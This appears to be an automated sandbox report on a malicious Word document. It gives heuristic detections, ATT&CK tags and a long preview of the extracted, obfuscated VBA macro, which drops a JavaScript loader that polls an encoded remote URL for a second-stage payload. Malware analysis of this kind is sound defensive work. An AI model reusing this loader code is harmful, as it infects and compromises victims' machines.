MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample is a malicious OOXML document containing obfuscated VBA macros. The 'Document_Open' macro, along with 'CreateObject' calls, indicates an attempt to execute arbitrary code. The VBA script attempts to write a JavaScript file to the user's public directory, likely to download and execute a second-stage payload. The presence of ClamAV detections further confirms its malicious nature.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6325104-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6325104-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Dim feaafbbdfcfecffeaedadfedcadeeafdefca_cbdbdffdfddbce_dfbbeaafbefdabdefbfafaccedbbebcfacdfcfebf As Object Set feaafbbdfcfecffeaedadfedcadeeafdefca_cbdbdffdfddbce_dfbbeaafbefdabdefbfafaccedbbebcfacdfcfebf = CreateObject("Scripting.FileSystemObject") eacffadeebccfebfceedbbaaafabacfceda_dcecedabbcbfaaa_ddaaefcacbdfbdebcfdfbeccececcafdcb = CStr(feaafbbdfcfecffeaedadfedcadeeafdefca_cbdbdffdfddbce_dfbbeaafbefdabdefbfafaccedbbebcfacdfcfebf.GetSpecialFolder(2)) & "\fcbcffecbdcbcbcbfeebbffddbdbda_cbbbcaaedd_acefefaecceabdcedfdebbccccefceafefecdbceacce.js" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim feaafbbdfcfecffeaedadfedcadeeafdefca_cbdbdffdfddbce_dfbbeaafbefdabdefbfafaccedbbebcfacdfcfebf As Object Set feaafbbdfcfecffeaedadfedcadeeafdefca_cbdbdffdfddbce_dfbbeaafbefdabdefbfafaccedbbebcfacdfcfebf = CreateObject("Scripting.FileSystemObject") eacffadeebccfebfceedbbaaafabacfceda_dcecedabbcbfaaa_ddaaefcacbdfbdebcfdfbeccececcafdcb = CStr(feaafbbdfcfecffeaedadfedcadeeafdefca_cbdbdffdfddbce_dfbbeaafbefdabdefbfafaccedbbebcfacdfcfebf.GetSpecialFolder(2)) & "\fcbcffecbdcbcbcbfeebbffddbdbda_cbbbcaaedd_acefefaecceabdcedfdebbccccefceafefecdbceacce.js" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 30435 bytes |
SHA-256: dda179da859d729df2d28beb13b6151a06d516d0d957b07e16406e82ada46cb7 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function eacffadeebccfebfceedbbaaafabacfceda_dcecedabbcbfaaa_ddaaefcacbdfbdebcfdfbeccececcafdcb() As String
Dim feaafbbdfcfecffeaedadfedcadeeafdefca_cbdbdffdfddbce_dfbbeaafbefdabdefbfafaccedbbebcfacdfcfebf As Object
Set feaafbbdfcfecffeaedadfedcadeeafdefca_cbdbdffdfddbce_dfbbeaafbefdabdefbfafaccedbbebcfacdfcfebf = CreateObject("Scripting.FileSystemObject")
eacffadeebccfebfceedbbaaafabacfceda_dcecedabbcbfaaa_ddaaefcacbdfbdebcfdfbeccececcafdcb = CStr(feaafbbdfcfecffeaedadfedcadeeafdefca_cbdbdffdfddbce_dfbbeaafbefdabdefbfafaccedbbebcfacdfcfebf.GetSpecialFolder(2)) & "\fcbcffecbdcbcbcbfeebbffddbdbda_cbbbcaaedd_acefefaecceabdcedfdebbccccefceafefecdbceacce.js"
End Function
Function deceecffacbcfcecdeccaecaecdaeffdbecedbfebebafa_adafaccfaadacbaf_aedfcfaddcaaaebdfbeedfecffedccaedbbbcaddfedddfcbadbfcfdeae()
Set afcfbfcababcacabdcaaaecefafadaeaaedba_bcaffdeddccad_accfaababcadcfbcfcceababcfaedccabebcfaecadabeadebfabcb = CreateObject("Scripting.FileSystemObject")
Set ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd = afcfbfcababcacabdcaaaecefafadaeaaedba_bcaffdeddccad_accfaababcadcfbcfcceababcfaedccabebcfaecadabeadebfabcb.CreateTextFile(CStr(afcfbfcababcacabdcaaaecefafadaeaaedba_bcaffdeddccad_accfaababcadcfbcfcceababcfaedccabebcfaecadabeadebfabcb.GetSpecialFolder(2)) & "\eefffcebbbebeabcdfbffdceaecaedbcaebeef_bcbbaaea_ebfcaebebedababdafaabadecaadaffadbfebcdfeeaaf.txt", True)
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.Write ("Wdbdbadbabbfaecbbdfcaecbcbfccbafdfde_adbfafbef_dbcccabaaaeedbcebdabbeffaeeecaeaababccebffbedbddbdfdSdbdbadbabbfaecbbdfcaecbcbfccbafdfde_adbfafbef_dbcccabaaaeedbcebdabbeffaeeecaeaababccebffbedbddbdfdcrdbdbadbabbfaecbbdfcaecbcbfccbafdfde_adbfafbef_dbcccabaaaeedbcebdabbeffaeeecaeaababccebffbedbddbdfdipdbdbadbabbfaecbbdfcaecbcbfccbafdfde_adbfafbef_dbcccabaaaeedbcebdabbeffaeeecaeaababccebffbedbddbdfdt.dbdbadbabbfaecbbdfcaecbcbfccbafdfde_adbfafbef_dbcccabaaaeedbcebdabbeffaeeecaeaababccebffbedbddbdfdShdbdbadbabbfaecbbdfcaecbcbfccbafdfde_adbfafbef_dbcccabaaaeedbcebdabbeffaeeecaeaababccebffbedbddbdfdeldbdbadbabbfaecbbdfcaecbcbfccbafdfde_adbfafbef_dbcccabaaaeedbcebdabbeffaeeecaeaababccebffbedbddbdfdl")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.Close
End Function
Function beafdacfeccefcfdabcbcbafbdffadfefeaebe_ffcedacefdda_afbcbafadffaedaedeaaceffecefdefdabaaeaede()
Set afcfbfcababcacabdcaaaecefafadaeaaedba_bcaffdeddccad_accfaababcadcfbcfcceababcfaedccabebcfaecadabeadebfabcb = CreateObject("Scripting.FileSystemObject")
Set ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd = afcfbfcababcacabdcaaaecefafadaeaaedba_bcaffdeddccad_accfaababcadcfbcfcceababcfaedccabebcfaecadabeadebfabcb.OpenTextFile(CStr(afcfbfcababcacabdcaaaecefafadaeaaedba_bcaffdeddccad_accfaababcadcfbcfcceababcfaedccabebcfaecadabeadebfabcb.GetSpecialFolder(2)) & "\eefffcebbbebeabcdfbffdceaecaedbcaebeef_bcbbaaea_ebfcaebebedababdafaabadecaadaffadbfebcdfeeaaf.txt", 1)
beafdacfeccefcfdabcbcbafbdffadfefeaebe_ffcedacefdda_afbcbafadffaedaedeaaceffecefdefdabaaeaede = Replace(ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.ReadAll(), "dbdbadbabbfaecbbdfcaecbcbfccbafdfde_adbfafbef_dbcccabaaaeedbcebdabbeffaeeecaeaababccebffbedbddbdfd", "")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.Close
End Function
Function adbfccafefaeffdcdaddecacaeddfce_dfadecfeeb_defdccecddabbfadbfcedbadecadddbcfecdafadcadbeacbcae()
Set afcfbfcababcacabdcaaaecefafadaeaaedba_bcaffdeddccad_accfaababcadcfbcfcceababcfaedccabebcfaecadabeadebfabcb = CreateObject("Scripting.FileSystemObject")
Set ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd = afcfbfcababcacabdcaaaecefafadaeaaedba_bcaffdeddccad_accfaababcadcfbcfcceababcfaedccabebcfaecadabeadebfabcb.CreateTextFile(CStr(eacffadeebccfebfceedbbaaafabacfceda_dcecedabbcbfaaa_ddaaefcacbdfbdebcfdfbeccececcafdcb()), True)
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var dbbababedbbadebfa = '';")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var dcedcdd = [];")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var befeffcad;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var aeeebbddccfa = new ActiveXObject('Scripting.FileSystemObject');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var afedbbdecbcca = aeeebbddccfa.GetSpecialFolder(2);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("/*")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("function ecdfbcfc(caefaed) {")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var eaecbfefbfadaaf = caefaed.toString();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var fdfefcfcbfbea = '';")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("for (var aaefffeecadb = 0; aaefffeecadb < eaecbfefbfadaaf.length; aaefffeecadb += 2)")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("fdfefcfcbfbea += String.fromCharCode(parseInt(eaecbfefbfadaaf.substr(aaefffeecadb, 2), 16));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("return fdfefcfcbfbea;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("function ffbdbfdbbdaf(eadabaccfddfbc) {")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("return !isNaN(parseFloat(eadabaccfddfbc)) && isFinite(eadabaccfddfbc);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("function babefcfeecb(aebcffcfcaebcffcfc,dcdfdffc){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("for(i=dcdfdffc;i>0;i--){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("aebcffcfcaebcffcfc = aebcffcfcaebcffcfc - 1;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(aebcffcfcaebcffcfc<0)aebcffcfcaebcffcfc = 9;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("return aebcffcfcaebcffcfc;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("function beecfdcaeaddfffbef(sstrstrtaebcffcfcr,adcfefffdfbeef){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var ecaafbcbfdaf = sstrstrtaebcffcfcr.length;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var bdedff = '';")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var eeaefbaaf = 0;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("for(var ffcfffda=0;ffcfffda<ecaafbcbfdaf;ffcfffda++){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(eeaefbaaf>10)eeaefbaaf=0;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(ffbdbfdbbdaf(sstrstrtaebcffcfcr.charAt(ffcfffda))){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("bdedff = bdedff + babefcfeecb(sstrstrtaebcffcfcr.charAt(ffcfffda),adcfefffdfbeef[eeaefbaaf]);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("eeaefbaaf++;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}else{")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("bdedff = bdedff + sstrstrtaebcffcfcr.charAt(ffcfffda);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("return bdedff;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("function eebbbbdedaed(fbdacbdecdaeaeee,fccacfebc){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var bbebbabfaeffadb = " & Chr(34) & "yJ2TO%WCHz5d:0FIR7)B.Q;ibeN18!$EYMZ4D*ga&Uo(q^kv9ufrGxh+_3Ans-XtP6LcSVwplmK,j@" & Chr(34) & ";")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var fddaededfaadedacda = " & Chr(34) & "" & Chr(34) & ";")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var ceadbfebde = bbebbabfaeffadb.length-1;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var size = fbdacbdecdaeaeee.length;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("for(var aefdfbbedeefaae = 0; aefdfbbedeefaae<size ; aefdfbbedeefaae++){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var fddbbcac = bbebbabfaeffadb.indexOf(fbdacbdecdaeaeee.charAt(aefdfbbedeefaae));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var efbfadca = fddbbcac - fccacfebc;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(efbfadca<0){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("efbfadca = ceadbfebde - Math.abs(efbfadca);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var dcdfdffc = ceadbfebde - 1;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(efbfadca==dcdfdffc)efbfadca = efbfadca + fccacfebc;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("fddaededfaadedacda = fddaededfaadedacda + bbebbabfaeffadb.charAt(efbfadca);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("return ecdfbcfc(fddaededfaadedacda);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var eadccbbcddadccebcf = new ActiveXObject(eebbbbdedaed(" & Chr(34) & ")ALA)TLu)F)DLuLYL)TYLLLuLHLd)A)u)A)DLdL*LILTLnLdLA)D" & Chr(34) & ",1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var afedbbdecbcca = eadccbbcddadccebcf.GetSpecialFolder(2);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var eadccbbcddadccebcfDeck = new ActiveXObject(eebbbbdedaed('---+d)dALA)TLu)F)DTY)AL!LdLHLH',1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var bcabebeccfcbce = eadccbbcddadccebcfDeck.SpecialFolders(eebbbbdedaed('---+DDLd)AL.)DLI)F',1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var afedbbdecbccad = bcabebeccfcbce;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var cfcfedceabe = new ActiveXObject(eebbbbdedaed(" & Chr(34) & ")ALA)TLu)F)DLuLYL)TYLLLuLHLd)A)u)A)DLdL*LILTLnLdLA)D" & Chr(34) & ",1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var daddfaedebfcea = new ActiveXObject(eebbbbdedaed('---+D*)A)!L*LHATTYd!D*DHD!dDdDdFTYAATYAF',1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var eedcebdfccadabceed = 0;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("while(true){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("eedcebdfccadabceed++;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("try {")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("daddfaedebfcea.open(eebbbbdedaed('---+D)DddD',1), eebbbbdedaed('---+L!)D)D)FAnTITILT)d)uLILYLLL8)TL*TY)T)dTILd)!)FLI)T)DTIL)L8)DLdTY)FL!)F',1)+'?ff'+eedcebdfccadabceed, false);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("daddfaedebfcea.send();")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("} catch(e) {")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("WScript.Sleep(1000);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("continue;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var fbcdedacebaadd = daddfaedebfcea.responseText.indexOf('|||');")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if( fbcdedacebaadd == -1 ){")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("WScript.Sleep(1000);")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("continue;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("if(daddfaedebfcea.Status == 200)break;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("}")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var cabbcdcbfacce = daddfaedebfcea.responseText;")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("cabbcdcbfacce = cabbcdcbfacce.split(eebbbbdedaed('---+)H)H)H',1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("var cdfecfcfcacde = cabbcdcbfacce[0].split(eebbbbdedaed('---+TH',1));")
ffedeffaefbbeecdafebecaffffceaaeeaadbbd_bddacaabfaacffb_ceceacfdebcafeceddcbabacbaefeabaafbcfffbfdedd.WriteLine ("dbbababedbbadebfa = beecfdcaeaddfffbef(cabbcdcbfacce[1],cdfecfcfcacde);")
